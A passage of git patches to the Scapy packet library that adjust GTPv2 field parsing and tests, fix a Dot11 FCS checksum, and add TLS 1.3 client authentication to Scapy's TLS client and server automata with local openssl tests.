adjust=lambda pkt, x: len(pkt.payload) + - 4, fmt="H"), + FieldLenField("length", 8), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), - BitField("DAF", 0, 1), - BitField("DTF", 0, 1), - BitField("HI", 0, 1), - BitField("DFI", 0, 1), - BitField("OI", 0, 1), - BitField("ISRSI", 0, 1), - BitField("ISRAI", 0, 1), - BitField("SGWCI", 0, 1), - BitField("SQCI", 0, 1), - BitField("UIMSI", 0, 1), - BitField("CFSI", 0, 1), - BitField("CRSI", 0, 1), - BitField("PS", 0, 1), - BitField("PT", 0, 1), - BitField("SI", 0, 1), - BitField("MSV", 0, 1), - + ConditionalField( + BitField("DAF", 0, 1), lambda pkt: pkt.length > 0), + ConditionalField( + BitField("DTF", 0, 1), lambda pkt: pkt.length > 0), + ConditionalField( + BitField("HI", 0, 1), lambda pkt: pkt.length > 0), + ConditionalField( + BitField("DFI", 0, 1), lambda pkt: pkt.length > 0), + ConditionalField( + BitField("OI", 0, 1), lambda pkt: pkt.length > 0), + ConditionalField( + BitField("ISRSI", 0, 1), lambda pkt: pkt.length > 0), + ConditionalField( + BitField("ISRAI", 0, 1), lambda pkt: pkt.length > 0), + ConditionalField( + BitField("SGWCI", 0, 1), lambda pkt: pkt.length > 0), + ConditionalField( + BitField("SQCI", 0, 1), lambda pkt: pkt.length > 1), + ConditionalField( + BitField("UIMSI", 0, 1), lambda pkt: pkt.length > 1), + ConditionalField( + BitField("CFSI", 0, 1), lambda pkt: pkt.length > 1), + ConditionalField( + BitField("CRSI", 0, 1), lambda pkt: pkt.length > 1), + ConditionalField( + BitField("PS", 0, 1), lambda pkt: pkt.length > 1), + ConditionalField( + BitField("PT", 0, 1), lambda pkt: pkt.length > 1), + ConditionalField( + BitField("SI", 0, 1), lambda pkt: pkt.length > 1), + ConditionalField( + BitField("MSV", 0, 1), lambda pkt: pkt.length > 1), ConditionalField( BitField("RetLoc", 0, 1), lambda pkt: pkt.length > 2), ConditionalField( @@ -1172,8 +1186,9 @@ class IE_ChargingCharacteristics(gtp.IE_Base): class IE_PDN_type(gtp.IE_Base): name = "IE PDN Type" fields_desc = [ByteEnumField("ietype", 99, IEType), - FieldLenField("length", None, length_of="PDN_type", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 5), @@ -1215,8 +1230,9 @@ class IE_APN_Restriction(gtp.IE_Base): class IE_SelectionMode(gtp.IE_Base): name = "IE Selection Mode" fields_desc = [ByteEnumField("ietype", 128, IEType), - FieldLenField("length", None, length_of="SelectionMode", - adjust=lambda pkt, x: x + 4, fmt="H"), + FieldLenField("length", None, length_of="length", + adjust=lambda pkt, x: len(pkt.payload) + + 4, fmt="H"), BitField("CR_flag", 0, 4), BitField("instance", 0, 4), BitField("SPARE", 0, 6), From a4c08d27dd86ca4870041a624e91c7f47a3bef93 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Sun, 12 Apr 2020 17:10:47 -0400 Subject: [PATCH 0092/1632] Remove unnecessary imports --- scapy/contrib/gtp_v2.py | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/gtp_v2.py b/scapy/contrib/gtp_v2.py index c2cc4836e10..de012783e10 100755 --- a/scapy/contrib/gtp_v2.py +++ b/scapy/contrib/gtp_v2.py @@ -23,10 +23,9 @@ from scapy.compat import orb from scapy.fields import BitEnumField, BitField, ByteEnumField, ByteField, \ - ConditionalField, IntField, IPField, LongField, PacketField, \ + ConditionalField, IntField, IPField, PacketField, FieldLenField, \ PacketListField, ShortEnumField, ShortField, StrFixedLenField, \ - StrLenField, ThreeBytesField, XBitField, XIntField, XShortField, \ - FieldLenField + StrLenField, ThreeBytesField, XBitField, XIntField, XShortField from scapy.data import IANA_ENTERPRISE_NUMBERS from scapy.packet import bind_layers, Packet, Raw from scapy.volatile import RandIP, RandShort From fdbc65cc3cbb8e8617991362c88a964bdf7192bc Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Sun, 12 Apr 2020 17:14:39 -0400 Subject: [PATCH 0093/1632] Modify MEI test --- test/contrib/gtp_v2.uts | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index afb0c27add6..c86c9113713 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -120,7 +120,7 @@ ie = IE_IPv4(ietype='IPv4', length=4, address='127.0.0.4') ie.ietype == 74 and ie.address == '127.0.0.4' = IE_MEI, dissection -h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b000800000000000001e24056000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" +h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b00080071655774980786ff56000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" gtp = Ether(hex_bytes(h)) ie = gtp.IE_list[1] ie.MEI == 123456 @@ -141,7 +141,7 @@ ie.ietype == 76 and ie.digits == b'111111111111' assert bytes(ie) == b'L\x00\x06\x00\x11\x11\x11\x11\x11\x11' = IE_Indication, dissection -h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b000800000000000001e24056000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" +h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b00080071655774980786ff56000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" gtp = Ether(hex_bytes(h)) ie = gtp.IE_list[10] ie.DAF == 0 and ie.DTF == 0 and ie.PS == 1 and ie.CCRSI == 0 and ie.CPRAI == 0 and ie.PPON == 0 and ie.CLII == 0 and ie.CPSR == 0 From 793b15d421466fd77d2cd0496cf72ddf834e79c0 Mon Sep 17 00:00:00 2001 From: Umakant Kulkarni Date: Sun, 12 Apr 2020 17:22:01 -0400 Subject: [PATCH 0094/1632] Fix gtp_v2 tests --- test/contrib/gtp_v2.uts | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/test/contrib/gtp_v2.uts b/test/contrib/gtp_v2.uts index c86c9113713..1019b1bc7cd 100644 --- a/test/contrib/gtp_v2.uts +++ b/test/contrib/gtp_v2.uts @@ -123,11 +123,11 @@ ie.ietype == 74 and ie.address == '127.0.0.4' h = "3333333333332222222222228100a384080045b800ed00000000fc1193430a2a00010a2a00027f61084b00d91c47482000cd140339f4d99f66000100080002081132547600004b00080071655774980786ff56000d001832f420303932f4200001e2405300030032f4205200010006570009008a000010927f0000025700090187000010927f00000247001a00196161616161616161616161616161616161616161616161616163000100014f000500017f0000034d0004000808000048000800000017000000a4105d002c0049000100e55700090385000010927f00000250001600580700000000000000000000000000000000000000007200020014005311004c" gtp = Ether(hex_bytes(h)) ie = gtp.IE_list[1] -ie.MEI == 123456 +ie.MEI == b"17567547897068" = IE_MEI, basic instantiation -ie = IE_MEI(ietype='MEI', length=1, MEI=123456) -ie.ietype == 75 and ie.MEI == 123456 +ie = IE_MEI(ietype='MEI', length=1, MEI=175675478970685) +ie.ietype == 75 and ie.MEI == 175675478970685 = IE_MSISDN, dissection h = "3333333333332222222222228100838408004580006d00000000f31180d20a2a00010a2a0002084b85930059e49a4823004d55819f6500ede7000200020010004c000600111111111111490001003248000800000061a8000249f07f000100005d001300490001000b0200020010005e00040039004f454a0004007f00000436f73a63" From 5837c08d6b6c969eea7784e7f3981b0c49f03601 Mon Sep 17 00:00:00 2001 From: gpotter Date: Thu, 16 Apr 2020 14:44:38 +0200 Subject: [PATCH 0095/1632] Fix checksum --- scapy/layers/dot11.py | 4 ++-- test/regression.uts | 5 +++++ 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 896005eaad8..0072a3437cb 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -239,7 +239,7 @@ def guess_payload_class(self, pay): class RadioTap(Packet): - name = "RadioTap dummy" + name = "RadioTap" deprecated_fields = { "Channel": ("ChannelFrequency", "2.4.3"), "ChannelFlags2": ("ChannelPlusFlags", "2.4.3"), @@ -580,7 +580,7 @@ def compute_fcs(self, s): def post_build(self, p, pay): p += pay if self.fcs is None: - p = p[:-4] + self.compute_fcs(p) + p = p[:-4] + self.compute_fcs(p[:-4]) return p diff --git a/test/regression.uts b/test/regression.uts index 40df5a53f63..ada7efc5b3c 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -1145,6 +1145,11 @@ pkt = RadioTap(data) w_payload = hex_bytes('00002000ae4000a0200800a02008000010028509a000e2006400000000000001a0403a0100c0caa47d504c6641ace4b300c0caa47d50000300200820000000000f291dd4d4391f3e34eb') assert raw(pkt) == w_payload += Dot11FCS computation + +pkt = RadioTap() / Dot11FCS() / Dot11Beacon() +assert raw(pkt) == b'\x00\x00\t\x00\x02\x00\x00\x00\x10\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00\x00\x00e\xd9=\xb9' + = WEP tests ~ wifi crypto Dot11 LLC SNAP IP TCP conf.wepkey = "" From 6dc345aa9b712c01b47d262d801c0c6dcc27f4f8 Mon Sep 17 00:00:00 2001 From: Roy Kupershmid Date: Thu, 9 Apr 2020 23:01:44 +0300 Subject: [PATCH 0096/1632] Invoke temporary files deletion routine when terminating --- scapy/config.py | 14 ++++++++++++++ scapy/main.py | 11 ----------- 2 files changed, 14 insertions(+), 11 deletions(-) diff --git a/scapy/config.py b/scapy/config.py index 95f5c4bbe26..b32fda9cc40 100755 --- a/scapy/config.py +++ b/scapy/config.py @@ -15,6 +15,7 @@ import time import socket import sys +import atexit from scapy import VERSION, base_classes from scapy.consts import DARWIN, WINDOWS, LINUX, BSD, SOLARIS @@ -686,3 +687,16 @@ def func_in(*args, **kwargs): "Please install python-cryptography v1.7 or later.") # noqa: E501 return func(*args, **kwargs) return func_in + + +def scapy_delete_temp_files(): + # type: () -> None + for f in conf.temp_files: + try: + os.unlink(f) + except Exception: + pass + del conf.temp_files[:] + + +atexit.register(scapy_delete_temp_files) diff --git a/scapy/main.py b/scapy/main.py index 524b1ba62c8..3fe206f3dba 100644 --- a/scapy/main.py +++ b/scapy/main.py @@ -452,17 +452,6 @@ def init_session(session_name, # type: Optional[Union[str, None]] ################ -def scapy_delete_temp_files(): - # type: () -> None - from scapy.config import conf - for f in conf.temp_files: - try: - os.unlink(f) - except Exception: - pass - del(conf.temp_files[:]) - - def _prepare_quote(quote, author, max_len=78): # type: (str, str, int) -> List[str] """This function processes a quote and returns a string that is ready From af54b3c1466fa2cdc395c93673f8e870f9340c0b Mon Sep 17 00:00:00 2001 From: rperez Date: Mon, 2 Sep 2019 09:43:00 +0200 Subject: [PATCH 0097/1632] Add client authentification --- scapy/layers/tls/automaton_cli.py | 74 ++++++++++++++++++++++++++++++- scapy/layers/tls/automaton_srv.py | 61 ++++++++++++++++++++++++- scapy/layers/tls/handshake.py | 3 +- scapy/layers/tls/keyexchange.py | 2 +- test/tls/example_server.py | 3 ++ test/tls/tests_tls_netaccess.uts | 24 +++++----- 6 files changed, 149 insertions(+), 18 deletions(-) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 1fe518bb343..6e879bb3873 100644 --- a/scapy/layers/tls/automaton_cli.py +++ b/scapy/layers/tls/automaton_cli.py @@ -34,7 +34,8 @@ TLSCertificateVerify, TLSClientHello, TLSClientKeyExchange, \ TLSEncryptedExtensions, TLSFinished, TLSServerHello, TLSServerHelloDone, \ TLSServerKeyExchange, TLS13Certificate, TLS13ClientHello, \ - TLS13ServerHello, TLS13HelloRetryRequest + TLS13ServerHello, TLS13HelloRetryRequest, TLS13CertificateRequest, \ + _ASN1CertAndExt from scapy.layers.tls.handshake_sslv2 import SSLv2ClientHello, \ SSLv2ServerHello, SSLv2ClientMasterKey, SSLv2ServerVerify, \ SSLv2ClientFinished, SSLv2ServerFinished, SSLv2ClientCertificate, \ @@ -874,6 +875,10 @@ def tls13_should_add_ClientHello(self): self.client_hello.ext = ext p = self.client_hello else: + if self.ciphersuite is None: + c = 0x1301 + else: + c = self.ciphersuite p = TLS13ClientHello(ciphers=self.ciphersuite, ext=ext) self.add_msg(p) raise self.TLS13_ADDED_CLIENTHELLO() @@ -915,6 +920,10 @@ def tls13_should_handle_ServerHello(self): @ATMT.condition(TLS13_RECEIVED_SERVERFLIGHT1, prio=2) def tls13_should_handle_HelloRetryRequest(self): + """ + XXX We should check the ServerHello attributes for discrepancies with + our own ClientHello. + """ self.raise_on_packet(TLS13HelloRetryRequest, self.TLS13_HELLO_RETRY_REQUESTED) @@ -986,10 +995,27 @@ def tls13_missing_encryptedExtension(self): def TLS13_HANDLED_ENCRYPTEDEXTENSIONS(self): pass + @ATMT.condition(TLS13_HANDLED_ENCRYPTEDEXTENSIONS, prio=1) + def tls13_should_handle_certificateRequest_from_encryptedExtensions(self): + """ + XXX We should check the CertificateRequest attributes for discrepancies + with the cipher suite, etc. + """ + self.raise_on_packet(TLS13CertificateRequest, + self.TLS13_HANDLED_CERTIFICATEREQUEST) + @ATMT.condition(TLS13_HANDLED_ENCRYPTEDEXTENSIONS, prio=2) def tls13_should_handle_certificate_from_encryptedExtensions(self): self.tls13_should_handle_Certificate() + @ATMT.state() + def TLS13_HANDLED_CERTIFICATEREQUEST(self): + pass + + @ATMT.condition(TLS13_HANDLED_CERTIFICATEREQUEST, prio=1) + def tls13_should_handle_Certificate_from_CertificateRequest(self): + return self.tls13_should_handle_Certificate() + def tls13_should_handle_Certificate(self): self.raise_on_packet(TLS13Certificate, self.TLS13_HANDLED_CERTIFICATE) @@ -1025,6 +1051,52 @@ def TLS13_HANDLED_FINISHED(self): def TLS13_PREPARE_CLIENTFLIGHT2(self): self.add_record(is_tls13=True) + @ATMT.condition(TLS13_PREPARE_CLIENTFLIGHT2, prio=1) + def tls13_should_add_ClientCertificate(self): + """ + If the server sent a CertificateRequest, we send a Certificate message. + If no certificate is available, an empty Certificate message is sent: + - this is a SHOULD in RFC 4346 (Section 7.4.6) + - this is a MUST in RFC 5246 (Section 7.4.6) + + XXX We may want to add a complete chain. + """ + hs_msg = [type(m) for m in self.cur_session.handshake_messages_parsed] + if TLS13CertificateRequest not in hs_msg: + raise self.TLS13_ADDED_CLIENTCERTIFICATE() + # return + certs = [] + if self.mycert: + certs += _ASN1CertAndExt(cert=self.mycert) + + self.add_msg(TLS13Certificate(certs=certs)) + raise self.TLS13_ADDED_CLIENTCERTIFICATE() + + @ATMT.state() + def TLS13_ADDED_CLIENTCERTIFICATE(self): + pass + + @ATMT.condition(TLS13_ADDED_CLIENTCERTIFICATE, prio=1) + def tls13_should_add_ClientCertificateVerify(self): + """ + XXX Section 7.4.7.1 of RFC 5246 states that the CertificateVerify + message is only sent following a client certificate that has signing + capability (i.e. not those containing fixed DH params). + We should verify that before adding the message. We should also handle + the case when the Certificate message was empty. + """ + hs_msg = [type(m) for m in self.cur_session.handshake_messages_parsed] + if (TLS13CertificateRequest not in hs_msg or + self.mycert is None or + self.mykey is None): + return self.tls13_should_add_ClientFinished() + self.add_msg(TLSCertificateVerify()) + raise self.TLS13_ADDED_CERTIFICATEVERIFY() + + @ATMT.state() + def TLS13_ADDED_CERTIFICATEVERIFY(self): + return self.tls13_should_add_ClientFinished() + @ATMT.condition(TLS13_PREPARE_CLIENTFLIGHT2) def tls13_should_add_ClientFinished(self): self.add_msg(TLSFinished()) diff --git a/scapy/layers/tls/automaton_srv.py b/scapy/layers/tls/automaton_srv.py index 069759b9af2..a0da1f9ee4d 100644 --- a/scapy/layers/tls/automaton_srv.py +++ b/scapy/layers/tls/automaton_srv.py @@ -29,14 +29,15 @@ from scapy.layers.tls.session import tlsSession from scapy.layers.tls.crypto.groups import _tls_named_groups from scapy.layers.tls.extensions import TLS_Ext_SupportedVersion_SH, \ - TLS_Ext_SupportedGroups, TLS_Ext_Cookie + TLS_Ext_SupportedGroups, TLS_Ext_Cookie, \ + TLS_Ext_SignatureAlgorithms from scapy.layers.tls.keyexchange_tls13 import TLS_Ext_KeyShare_SH, \ KeyShareEntry, TLS_Ext_KeyShare_HRR from scapy.layers.tls.handshake import TLSCertificate, TLSCertificateRequest, \ TLSCertificateVerify, TLSClientHello, TLSClientKeyExchange, TLSFinished, \ TLSServerHello, TLSServerHelloDone, TLSServerKeyExchange, \ _ASN1CertAndExt, TLS13ServerHello, TLS13Certificate, TLS13ClientHello, \ - TLSEncryptedExtensions, TLS13HelloRetryRequest + TLSEncryptedExtensions, TLS13HelloRetryRequest, TLS13CertificateRequest from scapy.layers.tls.handshake_sslv2 import SSLv2ClientCertificate, \ SSLv2ClientFinished, SSLv2ClientHello, SSLv2ClientMasterKey, \ SSLv2RequestCertificate, SSLv2ServerFinished, SSLv2ServerHello, \ @@ -507,6 +508,10 @@ def SENT_SERVERFLIGHT2(self): # TLS 1.3 handshake # @ATMT.state() def tls13_HANDLED_CLIENTHELLO(self): + """ + Check if we have to send an HelloRetryRequest + XXX check also with non ECC groups + """ s = self.cur_session m = s.handshake_messages_parsed[-1] # Check if we have to send an HelloRetryRequest @@ -592,6 +597,10 @@ def tls13_ADDED_ENCRYPTEDEXTENSIONS(self): @ATMT.condition(tls13_ADDED_ENCRYPTEDEXTENSIONS) def tls13_should_add_CertificateRequest(self): + if self.client_auth: + ext = [TLS_Ext_SignatureAlgorithms(sig_algs=["sha256+rsaepss"])] + p = TLS13CertificateRequest(ext=ext) + self.add_msg(p) raise self.tls13_ADDED_CERTIFICATEREQUEST() @ATMT.state() @@ -641,13 +650,61 @@ def tls13_WAITING_CLIENTFLIGHT2(self): @ATMT.state() def tls13_RECEIVED_CLIENTFLIGHT2(self): + print("tls13_RECEIVED_CLIENTFLIGHT2") pass @ATMT.condition(tls13_RECEIVED_CLIENTFLIGHT2, prio=1) + def tls13_should_handle_ClientFlight2(self): + print("tls13_should_handle_ClientFinished") + if self.client_auth: + print("raise_on_packet(TLS13Certificate") + self.raise_on_packet(TLS13Certificate, + self.TLS13_HANDLED_CLIENTCERTIFICATE) + else: + self.raise_on_packet(TLSFinished, + self.TLS13_HANDLED_CLIENTFINISHED) + + # RFC8446, section 4.4.2.4 : + # "If the client does not send any certificates (i.e., it sends an empty + # Certificate message), the server MAY at its discretion either + # continue the handshake without client authentication or abort the + # handshake with a "certificate_required" alert." + # Here, we abort the handshake. + @ATMT.state() + def TLS13_HANDLED_CLIENTCERTIFICATE(self): + if self.client_auth: + self.vprint("Received client certificate chain...") + self.vprint(self.cur_pkt.show()) + if isinstance(self.cur_pkt, TLS13Certificate): + if self.cur_pkt.certslen == 0: + raise self.TLS13_MISSING_CLIENTCERTIFICATE() + + @ATMT.condition(TLS13_HANDLED_CLIENTCERTIFICATE) + def tls13_should_handle_ClientCertificateVerify(self): + self.raise_on_packet(TLSCertificateVerify, + self.TLS13_HANDLED_CLIENT_CERTIFICATEVERIFY) + + @ATMT.condition(TLS13_HANDLED_CLIENTCERTIFICATE, prio=2) + def tls13_no_Client_CertificateVerify(self): + if self.client_auth: + raise self.TLS13_MISSING_CLIENTCERTIFICATE() + raise self.TLS13_HANDLED_CLIENT_CERTIFICATEVERIFY() + + @ATMT.state() + def TLS13_HANDLED_CLIENT_CERTIFICATEVERIFY(self): + pass + + @ATMT.condition(TLS13_HANDLED_CLIENT_CERTIFICATEVERIFY) def tls13_should_handle_ClientFinished(self): self.raise_on_packet(TLSFinished, self.TLS13_HANDLED_CLIENTFINISHED) + # TODO : change alert code + @ATMT.state() + def TLS13_MISSING_CLIENTCERTIFICATE(self): + self.vprint("Missing ClientCertificate!") + raise self.CLOSE_NOTIFY() + @ATMT.state() def TLS13_HANDLED_CLIENTFINISHED(self): self.vprint("TLS handshake completed!") diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 49a47166352..7505ab875de 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -55,7 +55,6 @@ from cryptography.hazmat.backends import default_backend from cryptography.hazmat.primitives import hashes - ############################################################################### # Generic TLS Handshake message # ############################################################################### @@ -1056,11 +1055,11 @@ class TLS13CertificateRequest(_TLSHandshake): _ExtensionsField("ext", None, length_from=lambda pkt: pkt.msglen - pkt.cert_req_ctxt_len - 3)] + ############################################################################### # ServerHelloDone # ############################################################################### - class TLSServerHelloDone(_TLSHandshake): name = "TLS Handshake - Server Hello Done" fields_desc = [ByteEnumField("msgtype", 14, _tls_handshake_type), diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index 03e5b7ca968..97071955167 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -154,7 +154,7 @@ class _TLSSignature(_GenericTLSSessionInheritance): #XXX 'sig_alg' should be set in __init__ depending on the context. """ name = "TLS Digital Signature" - fields_desc = [SigAndHashAlgField("sig_alg", 0x0401, _tls_hash_sig), + fields_desc = [SigAndHashAlgField("sig_alg", 0x0804, _tls_hash_sig), SigLenField("sig_len", None, fmt="!H", length_of="sig_val"), SigValField("sig_val", None, diff --git a/test/tls/example_server.py b/test/tls/example_server.py index c7e086f05dc..5d8c6320f2c 100755 --- a/test/tls/example_server.py +++ b/test/tls/example_server.py @@ -25,12 +25,15 @@ parser.add_argument("--curve", help="ECC curve to advertise (ex: secp256r1...") parser.add_argument("--cookie", action="store_true", help="Send cookie extension in HelloRetryRequest message") +parser.add_argument("--client_auth", action="store_true", + help="Require client authentication") args = parser.parse_args() pcs = None t = TLSServerAutomaton(mycert=basedir+'/test/tls/pki/srv_cert.pem', mykey=basedir+'/test/tls/pki/srv_key.pem', preferred_ciphersuite=pcs, + client_auth=args.client_auth, curve=args.curve, cookie=args.cookie) t.run() diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index 4f493bb51df..084dd790d09 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -133,25 +133,25 @@ def test_tls_server(suite="", version=""): print(q_.get()) -= Testing TLS server with TLS 1.0 and TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA -~ open_ssl_client +#= Testing TLS server with TLS 1.0 and TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA +#~ open_ssl_client -test_tls_server("ECDHE-RSA-AES128-SHA", "-tls1") +#test_tls_server("ECDHE-RSA-AES128-SHA", "-tls1") -= Testing TLS server with TLS 1.1 and TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA -~ open_ssl_client +#= Testing TLS server with TLS 1.1 and TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA +#~ open_ssl_client -test_tls_server("ECDHE-RSA-AES128-SHA", "-tls1_1") +#test_tls_server("ECDHE-RSA-AES128-SHA", "-tls1_1") -= Testing TLS server with TLS 1.2 and TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 -~ open_ssl_client +#= Testing TLS server with TLS 1.2 and TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 +#~ open_ssl_client -test_tls_server("DHE-RSA-AES128-SHA256", "-tls1_2") +#test_tls_server("DHE-RSA-AES128-SHA256", "-tls1_2") -= Testing TLS server with TLS 1.2 and TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 -~ open_ssl_client +#= Testing TLS server with TLS 1.2 and TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 +#~ open_ssl_client -test_tls_server("ECDHE-RSA-AES256-GCM-SHA384", "-tls1_2") +#test_tls_server("ECDHE-RSA-AES256-GCM-SHA384", "-tls1_2") + TLS client automaton tests From f9ed51b75d7d710f5e4109c568f84e8191a37a4d Mon Sep 17 00:00:00 2001 From: gpotter2 Date: Wed, 8 Apr 2020 10:39:56 +0000 Subject: [PATCH 0098/1632] Test client auth --- test/tls/tests_tls_netaccess.uts | 100 +++++++++++++------------------ 1 file changed, 40 insertions(+), 60 deletions(-) diff --git a/test/tls/tests_tls_netaccess.uts b/test/tls/tests_tls_netaccess.uts index 084dd790d09..3dd3f110636 100644 --- a/test/tls/tests_tls_netaccess.uts +++ b/test/tls/tests_tls_netaccess.uts @@ -14,7 +14,9 @@ from __future__ import print_function -import sys, os, re, time, multiprocessing, subprocess +import sys, os, re, time, subprocess +from scapy.modules.six.moves.queue import Queue +import threading from ast import literal_eval import os @@ -58,7 +60,7 @@ def check_output_for_data(out, err, expected_data): else: return (False, None) -def run_tls_test_server(expected_data, q, curve=None, cookie=False): +def run_tls_test_server(expected_data, q, curve=None, cookie=False, client_auth=False): correct = False print("Server started !") with captured_output() as (out, err): @@ -76,6 +78,7 @@ def run_tls_test_server(expected_data, q, curve=None, cookie=False): mykey=mykey, curve=curve, cookie=cookie, + client_auth=client_auth, debug=5) # Sync threads q.put(True) @@ -86,11 +89,12 @@ def run_tls_test_server(expected_data, q, curve=None, cookie=False): # Return data q.put(res) -def test_tls_server(suite="", version=""): +def test_tls_server(suite="", version="", tls13=False, client_auth=False): msg = ("TestS_%s_data" % suite).encode() # Run server - q_ = multiprocessing.Manager().Queue() - th_ = multiprocessing.Process(target=run_tls_test_server, args=(msg, q_)) + q_ = Queue() + th_ = threading.Thread(target=run_tls_test_server, args=(msg, q_, None, False, client_auth)) + th_.setDaemon(True) th_.start() # Synchronise threads q_.get() @@ -100,14 +104,13 @@ def test_tls_server(suite="", version=""): filename = os.getenv("SCAPY_ROOT_DIR")+filename if not os.path.exists(filename) else filename CA_f = os.path.abspath(filename) p = subprocess.Popen( - ["openssl", "s_client", "-connect", "127.0.0.1:4433", "-debug", "-cipher", suite, version, "-CAfile", CA_f], + ["openssl", "s_client", "-connect", "127.0.0.1:4433", "-debug", "-ciphersuites" if tls13 else "-cipher", suite, version, "-CAfile", CA_f], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT ) msg += b"\nstop_server\n" out = p.communicate(input=msg)[0] print(out.decode()) if p.returncode != 0: - th_.terminate() raise RuntimeError("OpenSSL returned with error code") else: p = re.compile(br'verify return:(\d+)') @@ -120,12 +123,10 @@ def test_tls_server(suite="", version=""): else: _one_success = True if _failed or not _one_success: - th_.terminate() raise RuntimeError("OpenSSL returned unexpected values") # Wait for server th_.join(5) if th_.is_alive(): - th_.terminate() raise RuntimeError("Test timed out") # Analyse values if q_.empty(): @@ -133,25 +134,35 @@ def test_tls_server(suite="", version=""): print(q_.get()) -#= Testing TLS server with TLS 1.0 and TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA -#~ open_ssl_client += Testing TLS server with TLS 1.0 and TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA +~ open_ssl_client + +test_tls_server("ECDHE-RSA-AES128-SHA", "-tls1") + += Testing TLS server with TLS 1.1 and TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA +~ open_ssl_client -#test_tls_server("ECDHE-RSA-AES128-SHA", "-tls1") +test_tls_server("ECDHE-RSA-AES128-SHA", "-tls1_1") -#= Testing TLS server with TLS 1.1 and TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA -#~ open_ssl_client += Testing TLS server with TLS 1.2 and TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 +~ open_ssl_client -#test_tls_server("ECDHE-RSA-AES128-SHA", "-tls1_1") +test_tls_server("DHE-RSA-AES128-SHA256", "-tls1_2") -#= Testing TLS server with TLS 1.2 and TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 -#~ open_ssl_client += Testing TLS server with TLS 1.2 and TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 +~ open_ssl_client -#test_tls_server("DHE-RSA-AES128-SHA256", "-tls1_2") +test_tls_server("ECDHE-RSA-AES256-GCM-SHA384", "-tls1_2") -#= Testing TLS server with TLS 1.2 and TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 -#~ open_ssl_client += Testing TLS server with TLS 1.3 and TLS_AES_256_GCM_SHA384 +~ open_ssl_client -#test_tls_server("ECDHE-RSA-AES256-GCM-SHA384", "-tls1_2") +test_tls_server("TLS_AES_256_GCM_SHA384", "-tls1_3", tls13=True) + += Testing TLS server with TLS 1.3 and TLS_AES_256_GCM_SHA384 and client auth +~ open_ssl_client + +test_tls_server("TLS_AES_256_GCM_SHA384", "-tls1_3", tls13=True, client_auth=True) + TLS client automaton tests @@ -179,12 +190,12 @@ def run_tls_test_client(send_data=None, cipher_suite_code=None, version=None): print("Running client...") t.run() 